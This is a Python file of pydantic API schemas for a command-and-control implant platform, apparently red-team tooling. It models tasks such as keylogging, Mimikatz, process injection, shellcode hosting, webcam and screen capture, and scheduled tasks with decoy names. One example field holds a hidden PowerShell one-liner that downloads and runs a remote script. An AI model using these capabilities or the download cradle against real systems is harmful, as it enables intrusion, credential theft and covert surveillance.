    filter: str = Field(
        ...,
        description="WQL filter string",
        example="Select * from Win32_OperatingSystem",
        title="Filter",
    )
class WmiQueryResults(Schema):
    # Results for a WQL query: error info plus a list of free-form result objects (one per row).
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[List[Dict[str, Any]]] = Field(
        [{}],
        description="Wmi results",
        example=[
            {
                "BootDevice": "\\Device\\HarddiskVolume5",
                "BuildNumber": 17134,
                "BuildType": "Multiprocessor Free",
                "Caption": "Microsoft Windows 10 Pro",
                "CodeSet": 1252,
            }
        ],
        title="Results",
    )
class WmiStaticCallArguments(Schema):
    # Arguments for calling a static WMI class method; `class_` is aliased to "class"
    # on the wire (reserved word in Python). Shares the common WMI connection fields.
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    class_: str = Field(
        ...,
        alias="class",
        description="Full class name",
        example="Win32_Process",
        title="Class",
    )
    method: str = Field(..., description="Method name", example="Create", title="Method")
    parameters: Dict[str, Any] = Field(
        ...,
        description="Method parameters",
        example={"CommandLine": "C:\\Windows\\System32\\cmd.exe"},
        title="Parameters",
    )
class WmiStaticCallResults(Schema):
    # Results for a static WMI method call: error info plus a free-form result object.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[Dict[str, Any]] = Field(
        {},
        description="Wmi results",
        example={
            "BootDevice": "\\Device\\HarddiskVolume5",
            "BuildNumber": 17134,
            "BuildType": "Multiprocessor Free",
            "Caption": "Microsoft Windows 10 Pro",
            "CodeSet": 1252,
        },
        title="Results",
    )
class BlobReferenceOrData(Schema):
    # Either a reference to stored blob data (id) or inline raw data; all fields optional.
    id: Optional[str] = Field(None, description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")
    data: Optional[bytes] = Field(None, description="Raw data", title="Data")
    hint: Optional[ContentHint] = Field(None, description="Content data type hint")
    size: Optional[int] = Field(0, description="Data size", title="Size")
class CameraCaptureResults(Schema):
    # Results for a camera capture: error info plus JPEG data as a blob reference.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="JPEG data from camera",
        example="EXAMPLE_JPEG",
        title="Data",
    )
class CameraListResults(Schema):
    # Results for a camera enumeration: error info plus the list of detected cameras.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    cameras: Optional[List[Camera]] = Field(
        [],
        description="List of available cameras",
        example=[{"id": 1, "name": "Logitech C120"}],
        title="Cameras",
    )
class ContextIdleResults(Schema):
    # Results for a session-idle query: error info plus idle minutes.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    minutes: Optional[int] = Field(
        0,
        description="Minutes the current user session has been idle",
        example=15,
        title="Minutes",
    )
class ContextProcessResults(Schema):
    # Results describing the current process context: pid, architecture, binary path, and token user.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    process_id: Optional[int] = Field(
        0,
        alias="processId",
        description="Current process id",
        example=1234,
        title="Processid",
    )
    architecture: Optional[Architecture] = Field("x64", description="Current process architecture", example="x64")
    path: Optional[str] = Field(
        "",
        description="Process binary path",
        example="C:\\Software\\Slingshot.exe",
        title="Path",
    )
    user_id: Optional[str] = Field(
        "",
        alias="userId",
        description="Token domain and username",
        example="ACME\\Jason",
        title="Userid",
    )
class ContextUserResults(Schema):
    # Results describing the current token user: domain/username, logon type, SID, and integrity level.
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    domain: Optional[str] = Field("", description="Token domain name", example="ACME", title="Domain")
    username: Optional[str] = Field("", description="Token user name", example="Jason", title="Username")
    netonly: Optional[bool] = Field(False, description="NETWORK_ONLY logon type", example=False, title="Netonly")
    sid: Optional[str] = Field(
        None,
        description="Security identifier",
        example="S-1-5-21-559599230-1559177840-3308743733-1004",
        title="Sid",
    )
    integrity: Optional[TokenIntegrity] = Field(None, description="Token integrity", example="medium")
class ExitResults(Schema):
    """Task results for an exit command; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileChangeDirectoryResults(Schema):
    """Task results for a change-directory command; reports the resulting directory."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    directory: Optional[str] = Field("", description="Current directory", example="C:\\Users", title="Directory")


class FileCopyResults(Schema):
    """Task results for a file-copy command; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileDownloadResults(Schema):
    """Task results for a file download; `data` holds the retrieved file contents."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="File data from remote filesystem",
        example="EXAMPLE_DATA",
        title="Data",
    )
class FileListArguments(Schema):
    """Arguments for a directory-listing task: target directory and time detail to request."""

    directory: Optional[str] = Field(
        ".\\",
        description="Directory path (supports environment variables)",
        example="C:\\Windows",
        title="Directory",
    )
    time_format: Optional[TimeFormat] = Field(
        "access",
        alias="timeFormat",
        description="Time detail to request",
        example="access",
    )
class FileListResults(Schema):
    """Task results for a directory listing: the entries found in the queried directory."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    entries: Optional[List[FileOrDirectory]] = Field(
        [],
        # Fixed user-facing typo: "entires" -> "entries".
        description="Directory entries",
        example=[
            {"name": "Windows", "isDir": True, "time": "2000-01-02T03:04:05"},
            {"name": "System32", "isDir": True, "time": "2000-01-02T03:04:05"},
            {
                "name": "root.dat",
                "isDir": False,
                "time": "2000-01-02T03:04:05",
                "size": 7344321,
            },
            {
                "name": "page.sys",
                "isDir": False,
                "time": "2000-01-02T03:04:05",
                "size": 5134,
            },
        ],
        title="Entries",
    )
class FileMakeDirectoryResults(Schema):
    """Task results for mkdir; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileMoveResults(Schema):
    """Task results for a file move; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileRemoveDirectoryResults(Schema):
    """Task results for rmdir; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileRemoveResults(Schema):
    """Task results for a file delete; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class FileUploadResults(Schema):
    """Task results for a file upload; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class HttpValidationError(Schema):
    """Standard HTTP 422 validation-error envelope: a list of field validation errors."""

    detail: Optional[List[ValidationError]] = Field(None, title="Detail")
class HostFileArguments(Schema):
    """Arguments for hosting a file on the web listener: data, endpoint path, encoding, and base URL."""

    encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )
    endpoint: str = Field(
        ...,
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )
    data: BlobReferenceOrData = Field(..., description="Data or blob to host", title="Data")
class HostFileResults(Schema):
    """Task results for file hosting; reports the final URL where the data is served."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    url: Optional[str] = Field(
        "",
        description="Final URL path for hosting",
        example="http://server.com/sub/path",
        title="Url",
    )


class HostPowershellResults(Schema):
    """Task results for Powershell hosting; `command` is the one-liner to launch the hosted script."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    command: Optional[str] = Field(
        "",
        description="Command line for execution",
        example="powershell.exe -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://server.com/sub/path'))\"",
        title="Command",
    )


class HostShellcodeResults(Schema):
    """Task results for shellcode hosting; reports the final URL where the data is served."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    url: Optional[str] = Field(
        "",
        description="Final URL path for hosting",
        example="http://server.com/sub/path",
        title="Url",
    )


class HostUnloadResults(Schema):
    """Task results for removing hosted content; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class InfoResults(Schema):
    """Task results with basic host/session info: hostname, architecture, OS version, token user."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    machine_name: Optional[str] = Field(
        "",
        alias="machineName",
        description="Machine hostname",
        example="EXAMPLE-PC",
        title="Machinename",
    )
    architecture: Optional[str] = Field(
        "",
        description="Current process architecture",
        example="x64",
        title="Architecture",
    )
    os_version: Optional[str] = Field(
        "",
        alias="osVersion",
        description="Operating system version",
        example="10.0.19041 [10 20H1]",
        title="Osversion",
    )
    user_id: Optional[str] = Field(
        "",
        alias="userId",
        description="Token domain and username",
        example="ACME\\John",
        title="Userid",
    )


class InjectResults(Schema):
    """Task results for an inject command; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class InstanceInResponse(Schema):
    """API response model for a deployed instance: identity, host metadata, last transaction, and routes."""

    id: UUID = Field(..., title="Id")
    tool: Tool
    tag: str = Field(..., max_length=50, title="Tag")
    name: str = Field(..., max_length=100, title="Name")
    hidden: bool = Field(..., title="Hidden")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    machine_name: str = Field(..., alias="machineName", max_length=256, title="Machinename")
    architecture: str = Field(..., max_length=100, title="Architecture")
    os_name: str = Field(..., alias="osName", max_length=100, title="Osname")
    os_version: str = Field(..., alias="osVersion", max_length=100, title="Osversion")
    context: str = Field(..., max_length=256, title="Context")
    user_name: str = Field(..., alias="userName", max_length=256, title="Username")
    last_transaction: Optional[TransactionInResponse] = Field(None, alias="lastTransaction")
    routes: Optional[List[RouteInResponse]] = Field([], title="Routes")
class KerberosLoadArguments(Schema):
    """Arguments for loading a Kerberos ticket into the current session."""

    ticket: BlobReferenceOrData = Field(
        ...,
        description="Kerberos ticket data",
        example="EXAMPLE_TICKET_DATA",
        title="Ticket",
    )


class KerberosLoadResults(Schema):
    """Task results for a Kerberos ticket load; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class KerberosPurgeResults(Schema):
    """Task results for a Kerberos ticket purge; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class KeylogGatherResults(Schema):
    """Task results for keylog collection; `keylog` holds the raw captured keystroke data."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    keylog: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="Raw captured keystroke data",
        example="EXAMPLE_KEYLOG_DATA",
        title="Keylog",
    )
class LinkResults(Schema):
    """Task results for a link attempt; lists any instances discovered during linking."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    discovered: Optional[List[DiscoveredInstance]] = Field(
        [],
        description="Discovered instance from the link attempt",
        example=[{"path": "mypipe1", "tag": "jPc4dpYI"}],
        title="Discovered",
    )


class ManagedModuleExecuteResults(Schema):
    """Task results for executing a loaded managed (.NET) module; `output` is its text output."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from native module",
        example="Custom output string",
        title="Output",
    )
class ManagedModuleLoadArguments(Schema):
    """Arguments for loading a managed (.NET) assembly, with optional framework version override."""

    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    module: BlobReferenceOrData = Field(
        ...,
        description="Managed assembly to load (.NET DLL)",
        example="MZ_EXAMPLE_MODULE",
        title="Module",
    )


class ManagedModuleLoadResults(Schema):
    """Task results for a managed-module load; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ManagedModuleUnloadResults(Schema):
    """Task results for a managed-module unload; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class MimikatzExecuteResults(Schema):
    """Task results for a Mimikatz command; `output` holds the module's console output."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from Mimikatz module",
        example="mimikatz 2.1.1 (arch x64)\nWindows NT 10.0 build 2657 (arch x64)\nmsvc 190024215 1",
        title="Output",
    )


class MimikatzLoadResults(Schema):
    """Task results for loading the Mimikatz module; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class MinidumpResults(Schema):
    """Task results for a minidump capture; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class NamedPipeSendArguments(Schema):
    """Arguments for sending data to a remote named pipe, with optional compression,
    encryption, and response wait."""

    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
    pipe: str = Field(..., description="Named pipe for delivery", example="SvcPipe", title="Pipe")
    data: BlobReferenceOrData = Field(..., description="Data to send", example="EXAMPLE_PIPE_DATA", title="Data")
    timeout: Optional[int] = Field(0, description="Named pipe timeout in seconds", title="Timeout")
    compress: Optional[bool] = Field(False, description="Compress data with zlib before sending", title="Compress")
    wait: Optional[bool] = Field(False, description="Wait for pipe response data", title="Wait")
    encryption_key: Optional[bytes] = Field(
        # Default was the str "" on a bytes field; use b"" so the default matches the
        # declared type. Also fixed description typos: "Symetric" -> "Symmetric",
        # "ommit" -> "omit".
        b"",
        alias="encryptionKey",
        description="Symmetric key to encrypt with, omit for no encryption",
        title="Encryptionkey",
    )
class NamedPipeSendResults(Schema):
    """Task results for a named-pipe send; `response` is set when a reply was requested."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    response: Optional[BlobReferenceOrData] = Field(
        None,
        description="Response from the remote pipe if requested",
        example="EXAMPLE_PIPE_RESPONSE",
        title="Response",
    )


class NativeModuleExecuteResults(Schema):
    """Task results for executing a loaded native module; `output` is its text output."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from native module",
        example="Custom output string!",
        title="Output",
    )


class NativeModuleLoadArguments(Schema):
    """Arguments for loading a native PE module, with optional in-memory obfuscation."""

    module: BlobReferenceOrData = Field(
        ...,
        description="Native PE module to load (DLL)",
        example="MZ_EXAMPLE_MODULE",
        title="Module",
    )
    obfuscate: Optional[bool] = Field(
        False,
        description="Obfuscate module in memory between uses",
        example=False,
        title="Obfuscate",
    )


class NativeModuleLoadResults(Schema):
    """Task results for a native-module load; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class NativeModuleUnloadResults(Schema):
    """Task results for a native-module unload; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class NetworkConnectResults(Schema):
    """Task results for a network connect sweep; lists hosts that accepted a connection."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    hosts: Optional[List[str]] = Field(
        [],
        description="List of hosts in which connections succeeded",
        example=["192.168.1.5", "192.168.1.6"],
        title="Hosts",
    )


class NetworkEnumerateSessionResults(Schema):
    """Task results for session enumeration; lists logon-session details."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    sessions: Optional[List[SessionDetails]] = Field(
        [],
        description="List of session details",
        example=[{"username": "Jason", "source": "SOURCE-PC", "active": 30, "idle": 15}],
        title="Sessions",
    )


class NetworkPingResults(Schema):
    """Task results for a ping; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class NetworkResolveResults(Schema):
    """Task results for name resolution via DNS and NetBIOS."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    dns_name: Optional[str] = Field(
        None,
        alias="dnsName",
        description="Address provided via DNS resolution",
        example="1.2.3.4",
        title="Dnsname",
    )
    nbns_name: Optional[str] = Field(
        None,
        alias="nbnsName",
        description="Address provided via NetBIOS resolution",
        example="1.2.3.4",
        title="Nbnsname",
    )
class PayloadSeed(Schema):
    """Minimal payload descriptor used to request payload generation (tool, name, optional C2 profile)."""

    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    profile: Optional[UUID] = Field(
        None,
        description="C2 profile to use (otherwise derive from current instance)",
        title="Profile",
    )


class PayloadWithData(Schema):
    """Payload record including the raw payload bytes."""

    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    version: str = Field(..., description="Tool version", title="Version")
    cached: datetime = Field(..., description="Payload cache time", title="Cached")
    ext: str = Field(..., description="Original payload extension", title="Ext")
    data: bytes = Field(..., description="Raw payload bytes", title="Data")


class PayloadWithMetadata(Schema):
    """Payload record carrying metadata only (no payload bytes)."""

    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    version: str = Field(..., description="Tool version", title="Version")
    cached: datetime = Field(..., description="Payload cache time", title="Cached")
class PowershellBaseResults(Schema):
    """Base Powershell task results; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class PowershellExecuteResults(Schema):
    """Task results for in-process Powershell execution; `output` is the pipeline output."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from Powershell module",
        example="\nName : ConsoleHost\nVersion : 5.1.19041.610\nInstanceId : 0484e4be-534a-4b4d-9ec2-a39109fbb490\n",
        title="Output",
    )


class PowershellLoadResults(Schema):
    """Task results for loading the Powershell module; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class PowershellStageArguments(Schema):
    """Arguments for staging a Powershell script, either inline data or a hosted URL."""

    script: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="Script data to stage before all additional execution",
        example="EXAMPLE_POSH_CODE",
        title="Script",
    )
    script_url: Optional[str] = Field(
        "",
        alias="scriptUrl",
        description="URL path for hosted script file",
        example="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1",
        title="Scripturl",
    )


class PowershellStageResults(Schema):
    """Task results for staging a Powershell script; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class PowershellUnstageResults(Schema):
    """Task results for unstaging a Powershell script; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class ProcessExecuteBaseResults(Schema):
    """Base results for process-execution tasks; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class ProcessListResults(Schema):
    """Task results for a process listing: every process visible to the query."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    processes: Optional[List[Process]] = Field(
        [],
        # Fixed user-facing typo: "queriable" -> "queryable".
        description="Complete list of queryable processes",
        example=[
            {"ppid": 0, "pid": 1, "sess": 0, "name": "System"},
            {
                "ppid": 567,
                "pid": 321,
                "sess": 1,
                "arch": "x86",
                "name": "chrome.exe",
                "owner": "ACME\\John",
                "path": "C:\\Google\\chrome.exe",
            },
            {
                "ppid": 567,
                "pid": 432,
                "sess": 1,
                "arch": "x64",
                "name": "cmd.exe",
                "owner": "ACME\\John",
                "path": "C:\\Windows\\System32\\cmd.exe",
            },
        ],
        title="Processes",
    )
class ProcessPowershellResults(Schema):
    """Task results from running powershell.exe; `output` is the captured console output."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from powershell.exe",
        example="Major Minor Build Revision\n----- ----- ----- --------\n5 1 19041 1",
        title="Output",
    )


class ProcessShellResults(Schema):
    """Task results from running cmd.exe; `output` is the captured console output."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from cmd.exe",
        example="Volume in drive C has no label.\nVolume Serial Number is 9ED1-36D3",
        title="Output",
    )


class ProcessStartResults(Schema):
    """Task results for starting a process; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class ProfileInResponse(Schema):
    """API response model for a C2 profile: id, tool, name, free-form data, and update time."""

    id: UUID = Field(..., title="Id")
    tool: Tool
    name: str = Field(..., max_length=265, title="Name")
    data: Dict[str, Any] = Field(..., title="Data")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")


class RttPortalAccessInfo(Schema):
    """Portal access status, with the device-flow authentication URL when one is pending."""

    status: RttPortalAccessStatus
    auth_url: Optional[str] = Field(
        None,
        alias="authUrl",
        description="URL to finish device flow authentication",
        title="Authurl",
    )
class RegistryCreateArguments(Schema):
    """Arguments for creating a registry key/value, locally or on a remote machine."""

    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")
    vtype: Optional[RegistryType] = Field("REG_NONE", description="Value type", example="REG_DWORD")
    data: Optional[str] = Field("", description="Registry value data", example="MyData", title="Data")
    force: Optional[bool] = Field(
        False,
        description="Overwrite existing entry if required",
        example=False,
        title="Force",
    )


class RegistryCreateResults(Schema):
    """Task results for a registry create; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class RegistryDeleteResults(Schema):
    """Task results for a registry delete; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class RegistryQueryResults(Schema):
    """Task results for a registry query: sub-keys and sub-values of the queried key."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    keys: Optional[List[str]] = Field(
        [],
        description="Sub-keys of the queried root key",
        example=[
            "HKEY_LOCAL_MACHINE\\Software\\Corp\\Cat",
            "HKEY_LOCAL_MACHINE\\Software\\Corp\\Dog",
        ],
        title="Keys",
    )
    values: Optional[List[RegistryValue]] = Field(
        [],
        description="Sub-values of the queried root key",
        example=[
            {"name": "LastAction", "type": "REG_SZ", "data": "Meow"},
            {"name": "MetaData", "type": "REG_BINARY", "data": "bWVvdw=="},
        ],
        title="Values",
    )
class ScheduledTaskCreateExArguments(Schema):
    """Arguments for creating a scheduled task from raw task XML, with optional remote
    machine and credentials."""

    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
    xml: BlobReferenceOrData = Field(
        ...,
        description="Raw task XML data",
        example="EXAMPLE_SCHTASKS_XML",
        title="Xml",
    )


class ScheduledTaskCreateExResults(Schema):
    """Task results for the extended scheduled-task create; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ScheduledTaskCreateResults(Schema):
    """Task results for a scheduled-task create; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ScheduledTaskDeleteResults(Schema):
    """Task results for a scheduled-task delete; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class ScheduledTaskQueryResults(Schema):
    """Task results for a scheduled-task query: sub-folders and task details."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    folders: Optional[List[str]] = Field(
        [],
        description="Sub-folders from query",
        example=["\\Microsoft", "\\Intel"],
        title="Folders",
    )
    tasks: Optional[List[TaskInfo]] = Field(
        [],
        description="Tasks results from query",
        example=[
            {
                "path": "Adobe Acrobat Update Task",
                "state": "ready",
                "lastRun": "2001-05-04 03:02:01",
                "lastResult": 0,
                "xml": "<xml>Example Task Xml</xml>",
            }
        ],
        title="Tasks",
    )


class ScheduledTaskStartResults(Schema):
    """Task results for starting a scheduled task; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ScheduledTaskStopResults(Schema):
    """Task results for stopping a scheduled task; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class ScreenshotResults(Schema):
    """Task results for a screenshot capture; `data` holds the JPEG bytes."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        description="JPEG data from screen",
        example="EXAMPLE_JPEG",
        title="Data",
    )


class ScriptInfo(Schema):
    """Metadata for a cached script: name, type, and cache time."""

    name: str = Field(..., description="Script name", title="Name")
